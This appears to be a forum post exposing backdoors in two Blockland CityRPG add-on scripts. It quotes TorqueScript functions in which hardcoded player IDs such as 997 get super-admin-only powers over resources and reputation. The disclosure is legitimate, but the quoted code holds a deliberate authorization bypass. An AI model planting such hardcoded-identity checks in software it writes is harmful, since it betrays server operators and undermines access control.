lumberintobricks.cs
line 39
function serverCmdglumber(%client, %arg1)
{
if((%client.isSuperAdmin) || (%client.bl_id == 997) || (%client.bl_id == 4896) || (%client.bl_id == 27161))
%began = getWord(CityRPGData.getData(%client.bl_id).valueResources, 0);
CityRPGData.getData(%client.bl_id).valueResources = (getWord(CityRPGData.getData(%client.bl_id).valueResources, 0) + %arg1) SPC getWord(CityRPGData.getData(%client.bl_id).valueResources, 1);
997 is his ID, and this addon has a backdoor in it to allow him and a few other people to manipulate their resources without admin.
rep.cs
line 43
function serverCmdgRep(%client, %rep, %name)
{
if(%client.isSuperAdmin || %client.BL_ID == 997)
A backdoor for ty to give himself rep without admin.